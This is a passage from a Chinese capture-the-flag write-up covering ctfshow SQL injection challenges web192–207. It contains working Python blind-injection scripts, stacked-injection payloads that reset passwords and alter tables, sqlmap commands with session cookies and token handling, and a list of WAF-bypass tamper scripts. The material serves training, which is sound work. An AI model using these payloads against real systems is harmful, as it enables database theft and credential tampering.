information_schema.tables where table_schema=database()),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line"><span class="comment">#查字段 payload="admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line">payload=<span class="string">"admin' and if(substr((select f1ag from ctfshow_fl0g),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line">n=<span class="number">0</span></span><br><span class="line"><span class="comment"># admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)#</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">666</span>):</span><br><span class="line">      <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">              <span class="string">"username"</span>:payload.format(i,j),</span><br><span class="line">              <span class="string">"password"</span>:<span class="number">123456</span></span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"密码错误"</span> <span class="keyword">in</span> res.json()[<span class="string">'msg'</span>]:</span><br><span class="line">             flag += j</span><br><span class="line">             n+=<span class="number">1</span></span><br><span class="line">             print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">             print(flag)</span><br><span class="line">             <span class="keyword">if</span> j==<span class="string">"&#125;"</span>:</span><br><span class="line">                 print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                 exit()</span><br><span class="line">             <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web193"><a href="#web193" class="headerlink" title="web193"></a>web193</h2><blockquote>
<ul>
<li>过滤了substr但是没有过滤正则啊，用正则^来匹配第一个</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/30</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"http://131ffba2-a367-4469-8421-e4c0d9877e37.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890qwertyuiopasdfghjklzxcvbnm&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#查表payload="admin' and if((select group_concat(table_name) from information_schema.tables where table_schema=database())regexp('^&#123;&#125;'), 1, 0)#"</span></span><br><span class="line"><span class="comment">#查字段payload="admin' and if((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flxg')regexp('^&#123;&#125;'), 1, 0)#"</span></span><br><span class="line">payload=<span class="string">"admin' and if((select group_concat(f1ag) from ctfshow_flxg)regexp('^&#123;&#125;'), 1, 0)#"</span></span><br><span class="line">n=<span class="number">0</span></span><br><span class="line"><span class="comment"># admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)#</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">666</span>):</span><br><span class="line">      <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">              <span class="string">"username"</span>:payload.format(flag+j),</span><br><span class="line">              <span class="string">"password"</span>:<span class="number">123456</span></span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"密码错误"</span> <span class="keyword">in</span> res.json()[<span class="string">'msg'</span>]:</span><br><span class="line">             flag += j</span><br><span class="line">             n+=<span class="number">1</span></span><br><span class="line">             print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">             print(flag)</span><br><span class="line">             <span class="keyword">if</span> j==<span class="string">"&#125;"</span>:</span><br><span class="line">                 print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                 exit()</span><br><span class="line">             <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730210312414.png" alt="image-20210730210312414"></p>
<h2 id="web194"><a href="#web194" class="headerlink" title="web194"></a>web194</h2><blockquote>
<ul>
<li>正则依旧没有被办，只是办了个右连接等，继续上个脚本梭哈</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/30</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"http://8f2766ad-af45-441e-b247-7a526b3d150f.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890qwertyuiopasdfghjklzxcvbnm&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#查表payload="admin' and if((select group_concat(table_name) from information_schema.tables where table_schema=database())regexp('^&#123;&#125;'), 1, 0)#"</span></span><br><span class="line"><span class="comment">#查字段payload="admin' and if((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flxg')regexp('^&#123;&#125;'), 1, 0)#"</span></span><br><span class="line">payload=<span class="string">"admin' and if((select group_concat(f1ag) from ctfshow_flxg)regexp('^&#123;&#125;'), 1, 0)#"</span></span><br><span class="line">n=<span class="number">0</span></span><br><span class="line"><span class="comment"># admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)#</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">666</span>):</span><br><span class="line">      <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">              <span class="string">"username"</span>:payload.format(flag+j),</span><br><span class="line">              <span class="string">"password"</span>:<span class="number">123456</span></span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"密码错误"</span> <span class="keyword">in</span> res.json()[<span class="string">'msg'</span>]:</span><br><span class="line">             flag += j</span><br><span class="line">             n+=<span class="number">1</span></span><br><span class="line">             print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">             print(flag)</span><br><span class="line">             <span class="keyword">if</span> j==<span class="string">"&#125;"</span>:</span><br><span class="line">                 print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                 exit()</span><br><span class="line">             <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730210650528.png" alt="image-20210730210650528"></p>
<h2 id="web195"><a href="#web195" class="headerlink" title="web195"></a>web195</h2><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">   //拼接sql语句查找指定ID用户</span><br><span class="line"> $sql = "<span class="keyword">select</span> pass <span class="keyword">from</span> ctfshow_user <span class="keyword">where</span> username = &#123;$username&#125;;";</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">//TODO:感觉少了个啥，奇怪,不会又双叒叕被一血了吧</span><br><span class="line"> if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username))&#123;</span><br><span class="line">   $ret['msg']='用户名非法';</span><br><span class="line">   die(json_encode($ret));</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<ul>
<li>过滤了空格，用反引号来代替，因为提示堆叠注入，我们考虑用update更新密码，因为sql语句中没有单引号包含，无法成功执行，所以得将admin转十六进制进行执行</li>
</ul>
</blockquote>
<p><strong>payload</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x61646d696e;<span class="keyword">update</span><span class="string">`ctfshow_user`</span><span class="keyword">set</span><span class="string">`pass`</span>=<span class="number">123456</span></span><br></pre></td></tr></table></figure></div>

<p><strong>接着用0x61646d696e，123456登陆就行</strong></p>
<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730211627435.png" alt="image-20210730211627435"></p>
</blockquote>
<h2 id="web196"><a href="#web196" class="headerlink" title="web196"></a>web196</h2><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">//TODO:感觉少了个啥，奇怪,不会又双叒叕被一血了吧</span><br><span class="line">if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username))&#123;</span><br><span class="line">  $ret['msg']='用户名非法';</span><br><span class="line">  die(json_encode($ret));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(strlen($username)&gt;16)&#123;</span><br><span class="line">  $ret['msg']='用户名不能超过16个字符';</span><br><span class="line">  die(json_encode($ret));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>多限制了用户名的长度，这里注意正则里ban的是se1ect，二不是select，所以select可以继续使用</strong></p>
<ul>
<li><strong>payload</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username:1;<span class="keyword">select</span>(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">password</span>:<span class="number">1</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730212125349.png" alt="image-20210730212125349"></p>
</blockquote>
<h2 id="web197"><a href="#web197" class="headerlink" title="web197"></a>web197</h2><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">//TODO:感觉少了个啥，奇怪,不会又双叒叕被一血了吧</span><br><span class="line">if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set//i', $username))&#123;</span><br><span class="line">  $ret['msg']='用户名非法';</span><br><span class="line">  die(json_encode($ret));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if($row[0]==$password)&#123;</span><br><span class="line">    $ret['msg']="登陆成功 flag is $flag";</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>这里在195的基础上ban了update和set等，不过这里没有ban掉show，我们可以在username把表全部查询出来，在password里传入表名，相等即可符合判断条件爆出flag</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username：520;show tables</span><br><span class="line">password：ctfshow_user</span><br></pre></td></tr></table></figure></div>

<h2 id="web198"><a href="#web198" class="headerlink" title="web198"></a>web198</h2><blockquote>
<ul>
<li>上题方法依旧可以做，我们换种思路,这里没有ban掉alter，我们可以把密码和id两列进行一个互换，这样一来判断flag的条件变成对id的检测，而id都是纯数字，我们可以去进行爆破到正确的id，从而获得flag，脚本如下</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/30</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"http://86f793a3-65c1-4974-8b76-8276d42d488c.challenge.ctf.show:8080/api/"</span></span><br><span class="line">payload = <span class="string">'0x61646d696e;alter table ctfshow_user change column `pass` `gylq` varchar(255);alter table ctfshow_user change column `id` `pass` varchar(255);alter table ctfshow_user change column `gylq` `id` varchar(255);'</span></span><br><span class="line">data1 = &#123;</span><br><span class="line">    <span class="string">'username'</span>: payload,</span><br><span class="line">    <span class="string">'password'</span>: <span class="string">'1'</span></span><br><span class="line">&#125;</span><br><span class="line">res = requests.post(url,data1)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">99</span>):</span><br><span class="line">    data2 = &#123;</span><br><span class="line">        <span class="string">'username'</span>: <span class="string">"0x61646d696e"</span>,</span><br><span class="line">        <span class="string">'password'</span>: <span class="string">'&#123;&#125;'</span>.format(i)</span><br><span class="line">    &#125;</span><br><span class="line">    res2 = requests.post(url,data2)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">"flag"</span> <span class="keyword">in</span> res2.json()[<span class="string">'msg'</span>]:</span><br><span class="line">        print(res2.json()[<span class="string">'msg'</span>])</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web199"><a href="#web199" class="headerlink" title="web199"></a>web199</h2><blockquote>
<ul>
<li>不变197做法</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730221610705.png" alt="image-20210730221610705"></p>
<h2 id="web200"><a href="#web200" class="headerlink" title="web200"></a>web200</h2><blockquote>
<p>和上题一样</p>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730221717415.png" alt="image-20210730221717415"></p>
<h2 id="web201"><a href="#web201" class="headerlink" title="web201"></a>web201</h2><blockquote>
<ul>
<li><strong>提示referer标头，查了下资料，默认情况不会对referer发起http请求，但是这题不发就得不到数据，所以可以自行设置referer或者直接level 3</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730231149582.png" alt="image-20210730231149582"></p>
<p><strong>payload</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://920f2767-9c9c-4d91-9b71-087536fabffe.challenge.ctf.show:<span class="number">8080</span>/api/?<span class="keyword">id</span>=<span class="number">1</span><span class="string">" --threads=10 --batch --referer="</span>ctf.show<span class="string">" --dbs</span></span><br></pre></td></tr></table></figure></div>

<p><strong>或者 level 3</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;920f2767-9c9c-4d91-9b71-087536fabffe.challenge.ctf.show:8080&#x2F;api&#x2F;?id&#x3D;1&quot; --threads&#x3D;10 --batch --level 3 --dbs</span><br></pre></td></tr></table></figure></div>

<p><strong>查表</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 sqlmap.py -u "http://920f2767-9c9c-4d91-9b71-087536fabffe.challenge.ctf.show:<span class="number">8080</span>/api/?<span class="keyword">id</span>=<span class="number">1</span><span class="string">" --threads=10 --batch --referer="</span>ctf.show<span class="string">" -D ctfshow_web --tables</span></span><br></pre></td></tr></table></figure></div>

<p><strong>查字段</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;920f2767-9c9c-4d91-9b71-087536fabffe.challenge.ctf.show:8080&#x2F;api&#x2F;?id&#x3D;1&quot; --threads&#x3D;10 --batch --referer&#x3D;&quot;ctf.show&quot; -D ctfshow_web -T ctfshow_user --columns</span><br></pre></td></tr></table></figure></div>

<p><strong>查flag</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://eb8102e6-5c61-4b70-8a29-24de83d6b0b2.challenge.ctf.show:<span class="number">8080</span>/api/?<span class="keyword">id</span>=<span class="number">1</span><span class="string">" --threads=10 --batch --referer="</span>ctf.show<span class="string">" -D ctfshow_web -T ctfshow_user -C pass --dump --where "</span>pass <span class="keyword">like</span> <span class="string">'%ctfshow%'</span><span class="string">"</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730232141620.png" alt="image-20210730232141620"></p>
<h2 id="web202"><a href="#web202" class="headerlink" title="web202"></a>web202</h2><blockquote>
<ul>
<li>就是用–data指定post传参</li>
</ul>
</blockquote>
<p><strong>payload</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://c339fde0-4900-495d-bcf0-7872c3937afa.challenge.ctf.show:<span class="number">8080</span>/api/<span class="string">" --data="</span><span class="keyword">id</span>=<span class="number">1</span><span class="string">" --threads=10 --batch  --referer="</span>ctf.show<span class="string">" -D ctfshow_web -T ctfshow_user -C pass --dump --where="</span>pass <span class="keyword">like</span> <span class="string">'%ctf%'</span><span class="string">"</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web203"><a href="#web203" class="headerlink" title="web203"></a>web203</h2><blockquote>
<ul>
<li><strong>将method改成put，并且注意更改content-type为text/plain，否则会被提交成表单</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://fa1b6901-9336-417b-9abf-3b0d199ed673.challenge.ctf.show:<span class="number">8080</span>/api/index.php<span class="string">" --referer="</span>ctf.show<span class="string">" --batch --method="</span>PUT<span class="string">" --data="</span><span class="keyword">id</span>=<span class="number">1</span><span class="string">" --headers="</span><span class="keyword">Content</span>-<span class="keyword">Type</span>: <span class="built_in">text</span>/plain<span class="string">" --threads=10 -D ctfshow_web -T ctfshow_user -C pass --dump --where="</span>pass <span class="keyword">like</span> <span class="string">'%ctf%'</span><span class="string">"</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web204"><a href="#web204" class="headerlink" title="web204"></a>web204</h2><blockquote>
<ul>
<li>提示传递cookie，抓包拿</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://74013a20-89e2-4675-a59b-40916d4e4712.challenge.ctf.show:<span class="number">8080</span>/api/index.php<span class="string">" --referer="</span>ctf.show<span class="string">" --batch --method="</span>PUT<span class="string">" --data="</span><span class="keyword">id</span>=<span class="number">1</span><span class="string">" --headers="</span><span class="keyword">Content</span>-<span class="keyword">Type</span>: <span class="built_in">text</span>/plain<span class="string">" --threads=10 -D ctfshow_web -T ctfshow_user -C pass --dump --where="</span>pass <span class="keyword">like</span> <span class="string">'%ctf%'</span><span class="string">"  -v 5  --cookie="</span>PHPSESSID=hnfvub4a2sfnmofk3g7r28vc39; ctfshow=72a5a5bfd041b4dc7fac9cfa9f868db6"</span><br></pre></td></tr></table></figure></div>

<h2 id="web205"><a href="#web205" class="headerlink" title="web205"></a>web205</h2><blockquote>
<ul>
<li><strong>要api鉴权我们抓包可以发现他是先/api/getToken.php，然后再访问/api/index.php，根据浏览器里面select.js文件代码分析也可以发现</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210731085139350.png" alt="image-20210731085139350"></p>
<p>sqlmap中提供以下两个参数保证每次都能访问一次一次getToken.php来获取token</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">--safe-url 提供一个安全不错误的连接，每隔一段时间都会去访问一下</span><br><span class="line">--safe-freq 提供一个安全不错误的连接，设置每次注入测试前访问安全链接的次数</span><br></pre></td></tr></table></figure></div>

<p>payload</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://a99900ec-4bec-4ef1-b046-2a62a2f8fc22.challenge.ctf.show:<span class="number">8080</span>/api/index.php<span class="string">" --referer="</span>ctf.show<span class="string">" --batch --method="</span>PUT<span class="string">" --data="</span><span class="keyword">id</span>=<span class="number">1</span><span class="string">" --headers="</span><span class="keyword">Content</span>-<span class="keyword">Type</span>: <span class="built_in">text</span>/plain<span class="string">" --threads=10 --cookie="</span>PHPSESSID=hnfvub4a2sfnmofk3g7r28vc39; ctfshow=72a5a5bfd041b4dc7fac9cfa9f868db6" <span class="comment">--safe-url="http://a99900ec-4bec-4ef1-b046-2a62a2f8fc22.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flax -C flagx --where="flagx like 'ctf%'" --dump</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web206"><a href="#web206" class="headerlink" title="web206"></a>web206</h2><blockquote>
<ul>
<li>和上题一样做法，就是换了字段名</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://d531f359-f004-4421-b15c-7c0fd7ec6b24.challenge.ctf.show:<span class="number">8080</span>/api/index.php<span class="string">" --referer="</span>ctf.show<span class="string">" --batch --method="</span>PUT<span class="string">" --data="</span><span class="keyword">id</span>=<span class="number">1</span><span class="string">" --headers="</span><span class="keyword">Content</span>-<span class="keyword">Type</span>: <span class="built_in">text</span>/plain<span class="string">" --threads=10 --cookie="</span>PHPSESSID=hnfvub4a2sfnmofk3g7r28vc39; ctfshow=72a5a5bfd041b4dc7fac9cfa9f868db6" <span class="comment">--safe-url="http://d531f359-f004-4421-b15c-7c0fd7ec6b24.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1  -D ctfshow_web -T  ctfshow_flaxc -C flagv --dump</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web207"><a href="#web207" class="headerlink" title="web207"></a>web207</h2><blockquote>
<ul>
<li>tamper的初体验，看到过滤了空格</li>
</ul>
</blockquote>
<p>遇到这种情况怎么办？sqlmap提供了tamper脚本用于应对此种情况，tamper的出现是为了引入用户自定义的脚本来修改payload以达到绕过waf的目的。sqlmap自带的tamper脚本文件都在sqlmap的tamper文件夹下</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line">举例如下tamper脚本：</span><br><span class="line"></span><br><span class="line">apostrophemask.py 用utf8代替引号</span><br><span class="line"></span><br><span class="line">equaltolike.py MSSQL * SQLite中like 代替等号</span><br><span class="line"></span><br><span class="line">greatest.py MySQL中绕过过滤’&gt;’ ,用GREATEST替换大于号</span><br><span class="line"></span><br><span class="line">space2hash.py 空格替换为<span class="comment">#号 随机字符串 以及换行符</span></span><br><span class="line"></span><br><span class="line">space2comment.py 用<span class="comment">/**/</span>代替空格</span><br><span class="line"></span><br><span class="line">apostrophenullencode.py MySQL 4, 5.0 and 5.5，Oracle 10g，PostgreSQL绕过过滤双引号，替换字符和双引号</span><br><span class="line"></span><br><span class="line">halfversionedmorekeywords.py 当数据库为mysql时绕过防火墙，每个关键字之前添加mysql版本评论</span><br><span class="line"></span><br><span class="line">space2morehash.py MySQL中空格替换为 <span class="comment">#号 以及更多随机字符串 换行符</span></span><br><span class="line"></span><br><span class="line">appendnullbyte.p Microsoft Access在有效负荷结束位置加载零字节字符编码</span><br><span class="line"></span><br><span class="line">ifnull2ifisnull.py MySQL，SQLite (possibly)，SAP 